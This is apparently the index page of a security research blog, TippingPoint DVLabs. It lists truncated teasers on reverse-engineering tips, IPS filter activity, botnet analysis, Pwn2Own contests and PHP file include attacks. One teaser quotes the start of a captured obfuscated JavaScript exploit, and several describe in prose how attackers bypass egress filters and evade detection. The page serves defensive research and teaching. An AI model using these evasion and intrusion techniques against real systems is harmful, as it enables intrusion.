TippingPoint Digital Vaccine Laboratories
DID YOU KNOW... Most phishing sites are hosted on compromised Apache + PHP + MySQL servers located in the US. Our Digital Vaccine service includes filters specifically designed to prevent potential victims from reaching many of these malicious sites.

MindshaRE: Finding Object Constructors

In a previous MindshaRE we touched on the power of searching in IDA. This time I want to revist that subject with an example of searching for constructors in a binary. This is a simple trick I use from time to time when I do not have symbols. Labeling objects before you start reverse engineering can be a huge help.MindshaRE is our weekly look at some simple reverse engineering tips and tricks. The goal is to keep thi ...


MindshaRE: Using Gflags

Microsoft's free set of debugging tools for Windows is invaluable when developing software, or debugging vulnerabilities. One tool in particular that stands out (Besides the venerable WinDbg) is glags. Gflags allows the user to define certain attributes to a process for the sole purpose of debugging. Today on MindshaRE we will take a look at the great options available when using gflags and WinDbg.MindshaRE is our weekly look at some simple reverse engineering tips and tricks. The goal i ...


MindshaRE: Utilizing PyDbg Within IDA

Previously on MindshaRE we have demonstrated using PyDbg as a companion to IDA. Today I wanted to demonstrate how to use PyDbg from within IDA. With the power of IDA, IDAPython, and PyDbg you can create powerful tools that are extremely helpful when reverse engineering.MindshaRE is our weekly look at some simple reverse engineering tips and tricks. The goal is to keep things small and discuss every day aspects of reversing. You can view previous entries here by going through our blog his ...


MindshaRE: Importing Multiple Modules Into a Single IDB

A question that has no doubt come up for many IDA Pro users in the past is, how can one load multiple modules into a single IDB? The question has been answered a few times on forums such as OpenRCE, and even Ilfak Guilfanov has written a 4 part blog about this. In case all of that information is not enough, today on MindshaRE we are g ...


Using PyMSRPC to Trigger MS08-067

There as been a lot of talk around Microsoft's MS08-067 out of band bulletin. Alexander Sotirov decompiled and annotated the vulnerable routine, Metasploit released a working exploit, in this post I will talk about a method you can utilize to qui ...


MindshaRE: Finding Executable Images in WinDbg

Working with malware often forces us to think outside of the box. The authors of malicious code employ a variety of techniques to keep investigative eyes from prying. To combat this we must also have some tricks up our sleeve. One of these such tricks allows us to dump executables from a binary after it has been unpacked, is ready to be written to disk, or before it is executed. Today we take a look at this very method here on MindshaRE.MindshaRE is our weekly look at some simple reverse ...


Line Noise

It's now October, and time for another Line Noise. I have to warn you, this one is full of thrills and chills and massive linkage. Without further ado, here we go!


MindshaRE: Path Finding

How many times have you been at an address in IDA and wanted to know all the ways you could reach that point? A million? Probably not. But its pretty useful to be able to find all the paths leading to a particular location in a binary. That's why today we are going to cover path finding.MindshaRE is our weekly look at some simple reverse engineering tips and tricks. The goal is to keep things small and discuss every day aspects of reversing. You can view previous entries here by going th ...


MindshaRE: Using Marks

Navigating in IDA Pro is generally an easy thing. Following functions, listing cross references, and going back to your previous location are all one key away. The problem is sometimes you can get a little lost and you end up forget where you left off. That's why marks were invented. Today we briefly discuss using marks when reverse engineering. This is a very simple concept but one you hopefully adopt and integrate into your process.MindshaRE is our weekly look at some simple reverse en ...


BA-Con and Ekoparty 2008

Having sufficiently recovered from my week-long trip to Buenos Aires its time to spread the word about some of the innovative research presented at Argentina's two most prominent security conferences. My coworker Ali and I first attended BA-Con, the newest conference venture from Dragos Ruiu (of CanSecWest, PacSec, and EUSecWest fame). Some of the highlights incl ...


MindshaRE: First Things First

This week on MindshaRE we want to share some of the things we do when beginning a reversing project. Some of these are obvious, and some may be new. It all serves the purposes of creating a solid foundation for the hard work to follow.MindshaRE is our weekly look at some simple reverse engineering tips and tricks. The goal is to keep things small and discuss every day aspects of reversing. You can view previous entries here by going through our blog history.It is important to kno ...


ThreatLinQ: Spyware and Executable Packers Revisited

Today marked another large spike in activity in our compressed binary download filters. Today we saw an increase of 420.3% for Filter 4111 that detects UPX compressed binary downloads over HTTP. For those that enabled these filters after my previous post (you did, right?) you might have been surprised in the amount of activity on your particular network over the past few days. In response to this increase in activity, I decided to do some research to further substantiate my claims that these fil ...


MindshaRE: Naming Conventions

It is my belief that reverse engineering is one part patience, one part experience, and a whole lot of organization. OK, maybe that is a bit of an exaggeration, but organization is essential to reversing. Having a decent naming convention you stick to, not only helps you in the short term, but also 6 months down the line when you or your co-workers look at your IDB. There is no "right" naming convention, but everyone should at least have one they use regularly. So today in MindshaRE we will cove ...


Line Noise

It's been a while, so I have a tasty treat for all of you. A super long rendition of Line Noise! Links from our IRC to your monitor!


ThreatLinQ: Enabling Packed Executable Filters

This post highlights TippingPoint IPS filters that look for packed or compressed binaries. Once the bastion of many an anti-virus software, these filters provide decent first level protection for a lot of malware. We have seen statistics as high as 80% of all malware is packed in some fashion or another. While legitimate uses of packers for commercial software has grown as well, I feel that with a bit of tuning, these filters can offer excellent protection for your network. I would recommend put ...


MindshaRE: WinDbg Introduction

Everyone has their favorite debugger. Sometimes the debugger debate can become almost religious.  All that aside you must be familiar with a debugger. Honestly it's just a matter of preference. WinDbg, OllyDbg/Immunity Debugger, and GDB will all accomplish the basic tasks you'll need in 90% of cases. So today I'm going to just get you started using WinDbg since it's my preference.  A few commands to wet your whistle in the hopes you get motivated to practice until a debugger is second ...


ThreatLinQ: Spotlight on Filter 5682

On our last 'Spotlight' blog post we looked at a filter which is likely to hit thousands of times a day on your network, this time, we are going to focus on a filter which hits much more rarely, but which is still and important filter in to have in your arsenal: Filter 5682 "Suspicious Hexadecimal IP address in URL"In a nutshell, this filter detects an obfuscation technique in order to disguise the target of a link. In most cases, web sites either link to hostnames (http://www.example.co ...


MindshaRE: Live Analysis Markup

I have mentioned before that I am always trying to bridge the gap between static analysis and live analysis. I try to always reverse statically but lets face it, sometimes due to time constraints, complexity, or dynamic resolution of functions we need a little help from our favorite debugger. So today I'll demonstrate a little tool I use to help me easily pull the information I need from a debugger and still stay focused in IDA. My simple live analysis markup utility might help you in these situ ...


ThreaLinQ: A Look at Adobe Flash Policy Files

Over the past few weeks I have been looking at Adobe Flash 9, specifically the policy file changes that were introduced with this version. By default, cross-domain communication is not allowed by Adobe Flash. Cross-domain communication violates the single origin policy that should be enforced by Internet applications, such as web browsers and browser extensions, in order to protect users and servers from cross-site request ...


ThreatLinQ: Movers and Shakers

Alright, it's time for an installment ThreatLinQ: Movers and Shakers. Most every week we will use this space to point out any interesting and or sudden events we may see in the ThreatLinQ data. This week there are a couple of PHP File Include filters which popped up on the movers and shakers page which are worth talking about:First, Filter 4270 saw a sudden increase in traffic on 9/08/2009.  This was due entirely to a single attacker from New Jersey targeting various PHP file includ ...


ThreatLinQ: Taking Out the Trash

One of the often cited benefits of IPS is the ability to keep ancient attacks from 'polluting' your otherwise pristine network.  The fact is, attacks such as Code Red and SQL Slammer are still out there in force. And while there may be literally a 0% chance of these attacks being successful on a machine in your environment, there is simply no reason to let them into your network.  Of course, when we tell people this, the first question we often get asked is "are these attacks R ...


MindshaRE: Using Structures

This week on MindshaRE we take a quick look at structures. I often see new reverse engineers skipping the creation of structures they encounter when disassembling a binary. While it is true that they can be slightly time consuming to create, the payoff in the end can far outweigh the minimal time investment. The biggest benefit will be during such things as OO method invocation, file format parsing, or packet tracing.  Hopefully the examples I have will convince you to spend those extra 20 ...


Three Letter Acronyms and the Imminent Death of the Net

Years ago, I was much more heavily involved in the network engineering side of the network world. Don't get me wrong, there's still plenty of groveling through packet captures here at TippingPoint's orbiting HQ, but I used to actually design networks and configure routers and do all of the nuts-and-bolts stuff that makes networks run.As a result of this, I know a reasonable amount about various low-level network protocols, including the wonderful, critical, byzantine, and obscure ...


ThreatLinQ: A Brave New World: Legitimate Script Obfuscation

As a filter writer, there is a blurred line between blocking real attacks and Internet annoyances. For example, today's Internet advertisements often use the same obfusction tactics as attackers in order to avoid scrubbing by content filtering systems.I have been doing some research on Peer-To-Peer (P2P) filters and came across something that illustrates this point very nicely. I came across the following trace that sent to a server that is on one of my IP watch lists:0000&nb ...


MindshaRE: The IDA Pro Book

IDA can be a very intimidating program to use. When starting out, not only are you trying to get comfortable with assembly, but you also must navigate a program with a steep learning curve. IDA's lack of documentation, aside from ida.hlp, compounds this problem leaving you somewhat insecure in your endeavor. Not anymore. A new book as been published by no starch press titled " ...


ThreatLinQ: A tale of two attackers

After my previous blog post last week about MS-SQL brute force attackers, I asked myself the question "who /are/ these guys?"  I mean, There are a lot of different attacks out there, why choose this one?  So, today I spent a couple hours trying to answer this question.Specifically, I decided to take the top 25 attackers from filter 463 'Bad MS-SQL SA Login' portscan them w/OS detection and some other probes and then compare them with the top 25 attackers from  our 'PHP File in ...


ThreatLinQ: Using Filter Groups - Guilty By Association

This post shows how the “Filter Group” section of the website can be used to find some very interesting events. Lets start by looking at the “Metasploit Shellcode” group, which is more often that not a very good starting point for finding malicious attackers. Not surprisingly, in analyzing ThreatLinQ data we have noticed that shellcode filters fire in tandem with many severe attacks. This makes sens ...


Line Noise

It's that awesome time unscheduled by conventional schedules for the blog that everyone loves to power Fridays with. Line Noise!  First up, Ali found a paper on someone implementing a sublanguage within haskell in order to enforce data flow control, for security reasons. A cool in concept, especially if you're a fan of the functional programming.Here's a set of new ...


Where are the Apples of Yesteryear?

 There was a time, not so long ago, where Apple was the plucky upstart. They weren't the second-largest music retailer in the United States. They didn't hold a virtual monopoly on portable music players, and they didn't capture nearly half of the high-end laptop market.Apple was instead, a geek's company. They were open and friendly, flexible and more than a little quirky. Sure, the fact that large portions of their code are open source is great, and certainly something of which ...


MindshaRE: Fixing Functions

IDA's function identification has always frustrated me. I could never understand why seemingly undefined functions weren't discovered during analysis. Recently, while attending RECon, I got my answer. While Ilfak, the creator of IDA, was giving a talk he explained why. He always errors on the side of caution. Meaning, unless he is 100% positive about a function he will leave it up to the user to fix. This isn't such a bad philosophy, unless you are dealing with hundred meg binaries. Regardle ...


Blackmail, Extortion or same old game?

My heart skipped at least two beats today when I opened a Google Alert and read the headline of “Researcher Blackmails Sun, Nokia” followed by a very brief description including not much more than a reference to Zero Day Initiative.In a panic I read the ZDNet article and then checked out the Security Explorations website, carefully pouring over their FAQ’s ...


ThreatLinQ: Spotlight on Filter 1401 (MS-SQL: Login Failure)

One of the cool things about the new ThreatLinQ tool, is we get to see TippingPoint Filters which have been shipping for years, still protecting customers.Today, I'd like to point out one of those filters in particular.Filter 1401 - MS-SQL: Login FailureThis filter does not ship enabled by default (generally speaking, login failures are entirely non-malicious), but if configured properly, this filter can be very useful for blocking brute force attacks.To illustrat ...


MindshaRE: Arithmetic in Assembly

In a previous MindshaRE we looked at loops in assembly.  I feel writing chunks of code in c and then disassembling them is an important bridge between higher level languages and assembly when you first start reversing.  This allows you to quickly recognize patterns and translate those back into their higher level representation.  Doing this is imperative to understanding a binary when reversing.  So today we will do a short followup, and look at arithmetic in assembly.  ...


ThreatLinQ: Movers and Shakers

Here we are looking at a filter that recently made the ThreatLinQ “Movers and Shakers” list, namely filter 1401 “MS-SQL: Login Failure.” We began watching this filter around 7-20-08 and it seems that it was just in time. On 7-21-08 we saw a sharp increase in filter hits and the majority of these hits are unique destination IP addressees, which is denoted by the blue bar. This pattern is often indicative of brut ...


ThreatLinQ: Javascript Bad Juju

The game of obfuscating especially JavaScript code has been going on for a while. The attackers are coming up with simple and ingenious ways to evade "string"-based detection. One of our sensors caught this clever technique for evading string-based detection of ActiveX CLSIDs. With hundreds of ActiveX vulnerabilities out there, it is very common to see a massive exploitation of them. Here is a cool trick we saw in action:<script>start();function z_sa(o,p, ...


ThreatLinQ: Bad to the Bone

If you've gone to any security conference over the last year, you surely have heard that threats on the internet are moving from general purpose, noisy attacks, to highly targeted attacks designed to only attack YOU...personally.  Now that the ThreatLinq program is up and running, it is satisfying to notice that many attackers are not only performing their attacks on multiple hosts, they commonly use many different attack vectors and payloads.  Take this IP address for instance: 89.156 ...


ThreatLinQ: ThreatLinQ Launch By DVLabs

TippingPoint DVLabs announced the availability of the "ThreatLinQ" Beta portal to all our customers today. The ThreatLinQ portal provides the TippingPoint customers with the latest information on the global attack landscape. The information provided provides an excellent source of background information, as well as actionable data for consideration in configuration of the IPS.  We will also be posting summaries of our findings and analysis regularly via this blog.W ...


MindshaRE: Anti-Reversing Techniques

Anti-reversing tricks have been around for a long time.  They most commonly occur in malware or spyware applications.  However, in recent times more applications are incorporating them into their code.  This might be to thwart reversing of intellectual property, or perhaps modification of the binary at run time.  So today we take a quick look at some of the most common categories anti-reversing techniques fall into, and a few examples from each type.MindshaRE is o ...


MindshaRE: Using Symbols

I've mentioned in a previous posting that cross references are the crux of reverse engineering. Exploring the connections between blocks of code and from function to function will reveal large quantities of information about your target. Those cross references however are useless without symbolic information, which can include names generated by the reverse engineer as well as names applied through a symbol file. Symbol files are easy to use, yet I still see people that are unaware of them, or d ...


MindshaRE: Cross References in IDA

I would say besides the navigation keys (Esc, Enter, Ctrl-Enter, Arrows), the most often sequence I use is X / Ctrl-X.  That's right, cross references.  Okay, maybe I use others just as much, but for today's MindshaRE we will be discussing cross references in IDA (I wanted to add some impact to the topic).  I will briefly cover what they are, the different types of references, and share some scripts utilizing xrefs that hopefully make your day easier.MindshaRE is our w ...


Building a Better Mousetrap: This Year at Black Hat

Are you interested in joining the exalted ranks of vulnerability analysts? Are you responsible for your organization's IPS/IDS deployment? Would you like to use those IPS/IDSes to the fullest of their potential?Well, you're in luck! Rohit and I are presenting a class at this year's Black Hat information security conference! ...


Line Noise

Hello to all of my delicious readers of the blogosphere!  It's time for another wacky installment of Line Noise, so you can walk a mile in our shoes, if our shoes weren't for walking and consisted solely of stories passed back and forth on an IRC server!First up is a link to bitdefender's new portal with a GTA theme. On a note that probably wouldn't fly in the computer security industry, Japan ...


Everything old is new again (again)!

It's a testimony to the scalability of version 4 of the Internet Protocol that it has scaled from a a network of a few dozen hosts to a globe-spanning network indispensable to hundreds of millions of people.But, like all good things, the reign of IPv4 is coming to an end. It's really an example of necessity - large swaths of the world are running out of IP space. The United States federal government has mandated that all its systems be capable of supporting IPv6 by 2008. Operating sy ...


Firefox 3.0 Vulnerability Patched

In less than a month after its official release, Mozilla fixed the vulnerability we reported to them in Firefox 3.0.  This vulnerability was acquired through our Zero Day Initiative and reported responsibly to Mozilla on June 17th, 2008.  Mozilla was able to fix this issue in a timely mann ...


MindshaRE: Hit Tracing in WinDbg

MindshaRE has focused exclusively on static analysis so far.  That is fine and all, but often we need a little dynamic help.  This can be due to virtual function calls, dynamic library calls, or just to speed things up.  So today we will add a little WinDbg to our diet and talk about hit tracing. I will also show a little script that lets us trace a process and import that trace into IDA.MindshaRE is our weekly look at some simple reverse engineering tips and tricks.&n ...


MindshaRE: Strings!

In this week's MindshaRE we will take a look at strings.  We will cover some of the obvious uses for strings as well as helpful application of strings in the binary.MindshaRE is our weekly look at some simple reverse engineering tips and tricks.  The goal is to keep things small and discuss every day aspects of reversing.  You can view previous entries here by going through our blog history.String examination is a frequent starting point for many reverser engin ...


MindshaRE: Identifying Encryption Functions

Welcome back to another installation of MindshaRE.  This week we will cover identifying a common pattern seen in encryption and compression functions.  The purpose is to quickly identify locations of interest in a binary that may handle this type of activity.MindshaRE is our weekly look at some simple reverse engineering tips and tricks.  The goal is to keep things small and discuss every day aspects of reversing.  You can view previous entries here by going through o ...


Cellular Interference

Like many others in the world, I've always been a skeptic of the need to disable cell phone antenna's on takeoff and landing. What kind of interference could possibly be caused to an airplane? We've all dealt with the minor nuisance of clicks and beeps when someone on a land line keeps their cell phone too close to the base, but serious interference to a plane? I always figured it was a better safe then sorry measure... Until a couple of weeks ago when I was doing some work in Photoshop on my ol ...


MindshaRE: Adding IDA to Explorer Context Handler

In this weeks MindshaRE we will show you how to add IDA into the right click context menu of windows explorer.  This is handy when quickly disassembling .dll's and .exe's.MindshaRE is our weekly look at some simple reverse engineering tips and tricks.  The goal is to keep things small and discuss every day aspects of reversing.  You can view previous entries here by going through our blog history.When disassembling binaries in IDA most people will go through a ...


Hacking the Pirates of the Caribbean Online MMORPG

My colleague Ali and I recently presented on Reverse Engineering Dynamic Languages, specifically Python, at RECON 2008. As a case study, we demonstrated hacking cheats into Disney's Pirates of the Caribbean Online game (slides here). The game has receiv ...


Line Noise

One comment and one angry email was all the encouragement we needed to keep Line Noise alive, so it's time again for another one so you can witness the extremely worksafe version of the links the DVLabs research team have been sharing with each other on our internal IRC.RepRap is a 3D rapid prototyper that can be built on the cheap. All of the com ...


MindshaRE: Searching in IDA

MindshaRE is our weekly look at some simple reverse engineering tips and tricks.  The goal is to keep things small and discuss every day aspects of reversing.  You can view previous entries here by going through our blog history. In this weeks installment of MindShaRE we will take a look at some fun uses for searching in IDA even utilizing IDC/IDAPython to automate this.IDA provides several different search options.  Rangin ...


Mozilla Firefox 3.0 Vulnerability

A number of people who monitor our Zero Day Initiative's Upcoming Advisories page noticed yesterday that we reported a vulnerability to Mozilla (ZDI-CAN-349).  Taking into account the coincidental timing of the Firefox 3.0 release, many are asking us if this is the first reported critical vulnerability in the latest version of the popular open source browser. What we can confirm is that about five hours after the of ...


RECON 08 Day 3

It's Monday and I'm back at our Austin headquarters with the team. We had a great time at RECON and in Montreal. Big thanks to the conference organizers and the high quality speakers. Three more interesting talks to mention on the final day of the conference...Pablo Sole from Immunity gave an overview of how Python scripting within ImmunityDbg can be used to assist in reverse engineer ...


RECON 08 Day 2

Some more interesting talks on the second day of the con. Craig Smith from Neohapsis gave an informative presentation on creating a custom code obfuscation virtual machine. The usage of a custom VM to obfuscate code has mostly been seen in various crackme's though it is starting to gain popularity in malware. There are legitimate commercial code virtualizers like Themida. This was an interesting talk and thought exercise that captured the attention of many at ...


RECON 08 Day 1

RECON is a single-track reverse engineering focused conference held bi-yearly in Montreal. The 2008 showing is the third iteration of the conference with hopefully many more to come. RECON is hands down my favorite conference, a sentiment shared by many other RECON attendees. A number of factors elevate this con above others:The talks. The general technical level of the talks at RECON, I feel, exceed most other cons.The size. RECON feels like t ...


MindshaRE: Looping in Assembly

MindshaRE is our weekly look at some simple reverse engineering tips and tricks.  The goal is to keep things small and discuss every day aspects of reversing.  You can view previous entries here by going through our blog history.After the entry last week comparing source to disassembly I thought it might be a good idea to cover some basics.  Often when learning how to read assembly is helps to take source code, compile it, and then look at it in your disassembler of ch ...


MindshaRE: Public Toolkits

This entry marks the first in a new weekly post I will be doing about general reverse engineering tips and tricks.  The focus of this blog will be to relay some simple tricks we apply here at TippingPoint that others might find useful while reverse engineering.  My goal is to be short and concise in these examples.  If you have any ideas, or suggestions (possibly to improve on something I posted) please email me, or leave a comment, and I'd be happy to share them in future posting ...


Line Noise

As a research team we come across a variety of interesting articles, papers and links ranging from cutting edge security research to silly web toys. We're constantly sharing information and commentary with one another and thought that it may be interesting for others to join in on the fun. So we have decided to dedicate some time to creating a generic "week in review" blog series. We'll see how it goes and we'll decide on whether or not to keep it up based on the feedback we receive. To ...


Owning Kraken Zombies, a Detailed Dissection

This blog contains the deep technical dive of a two-part blog series exploring the Kraken botnet. See "Kraken Botnet Infiltration" for more information regarding general statistics and observations of the botnet.Disclaimer: I don't normally deal with malicious code analysis. My main focuses are on vulnerability discovery and general reversing so dedicating some time to analyzing Kraken was a new and interestin ...


Kraken Botnet Infiltration

Earlier this month a number of articles surfaced on the research and disagreements with regards to the size and classification of a large bot net named Kraken. At the front line of the debate was SecureWorks and Damballa. Secureworks claims Kraken is actually Bobax and estimates the bot net to include over 185,000 compromised systems. Damballa disag ...


ToorCon Seattle Redux

This past weekend, Aaron and I attended and presented at ToorCon Seattle 2008...


PWN to OWN Adobe patch released

This year’s PWN to OWN wrap up includes another record breaking update by the affected vendor. Adobe has released a Flash update which corrects the bug found by Shane Macauley that he used to exploit the Windows Vista laptop at CanSecWest, as well as correcting a number ...


PWN to OWN: Final Day (and another winner!)

The third and final day of the PWN to OWN contest at the CanSecWest security conference begins today, March 28th at 12:30pm local time (PST) in Vancouver.  Yesterday, on day two of the contest, the MacBook Air was successfully compromised first and won by a team from Independent Security Evaluat ...


PWN to OWN Day Two: First Winner Emerges! (updated)

Congratulations to our first winner of the CanSecWest PWN to OWN contest!  At 12:38pm local time, the team of Charlie Miller, Jake Honoroff, and Mark Daniel from Independent Security Evaluators have successfully compromised the Apple MacBook Air, winning the laptop and $10,000 from TippingPoint's Zero Day Initiative.  They were ...


Hello from Black Hat Europe

Ero and I finished up our two day Reverse Engineering course yesterday and caught up on some much needed sleep after a few drinks at some local pubs. Got a chance to catch some of the talks today prior to flying out tomorrow morning to Barcelona for the weekend. FX had a well researched talk on ...


Day One: CanSecWest PWN to OWN Results

Today's first day of CansecWest's PWN to OWN contest is now officially over, and we can report that all three laptops are still standing without having been compromised.  At 2:45pm local time today, to much fanfare, Aaron made the official announcement of the contest's opening to the CanSecWest crowd.  As a reminder, the rules today allowed only for a contestant to use a ...


CanSecWest PWN to OWN 2008 (updated)

March 24th Update: We've modified the rules and increased the prize amounts. Please see the new rules detailed below.Since the announcement of the ZDI cash prize sponsorship for the CanSecWest PWN to OWN contest, we've received a lot of excellent and much appreciated feedback from the security community regarding the complexity of the original rules and the prize structure. We've gone back to the drawing boar ...


A Bit of History

To say that this post is only tangentially related to security would be stretching the meaning of the word "tangentially" almost to the point of structural failure, but this is just too awesome to pass up. I promise that, this week, I will write a much more interesting and relevant blog post.I've been doing a lot of work lately on TippingPoint's Custom Shield Writer tool, which we conveniently (and lovingly) refer to as "CSW". CSW allows a customer to write their own custom filters to ap ...


PHP File Include Attacks (Part 4 of 4)

Last week I talked about some different strategies for preventing PHP RFI attacks. I also mentioned that proper egress filters are all but foolproof for preventing such attacks. Well today we are going to learn that is not entirely true. There is a trick for completely bypassing egress filters called XSS reflection. And today we'll spend our time learning how this technique works. In a standard PHP RFI Attack, the attacker will send a link to some malicious PHP code som ...


PHP File Include Attacks (Part 3 of 4)

In the second part of this series on PHP file include vulnerabilities, we talked about the different types of payloads commonly seen in the wild. Today, I'm going to switch gears and talk about some strategies for preventing these attacks. Generally speaking, there are four primary ways to prevent falling victim to a PHP File Include attack. These are: 1. Add an IPS...of course!2. Modify your php configuration via php.ini.3. When writing PHP, make sure to sanitize all variables ...


PHP File Include Attacks (Part 2 of 4)

In the first part of this series, we talked about what a PHP file include attack is and what it looks like on the wire. This week we'll dive into how attackers are using these vulnerabilities, as well as take a look as some of the payloads they are using.To start, lets look at the different kinds of payloads people are using in the wild: Types of payloads: Sentinels: These payloads contain a simple unique string (or a small php function to generate a unique string.) T ...


PHP File Include Attacks (Part 1 of 4)

It's true. when polled, 4 out of 4 PHP programmers admit their mother's never once warned them about the dangers of PHP file include vulnerabilities. This is the statistic I use to explain why there are such impressively large numbers of vulnerable PHP applications. But, while lack of motherly guidance is a likely factor, the bigger picture is more complicated. For instance, while PHP file include attacks represented over 20% of all osvdb entries for 2006...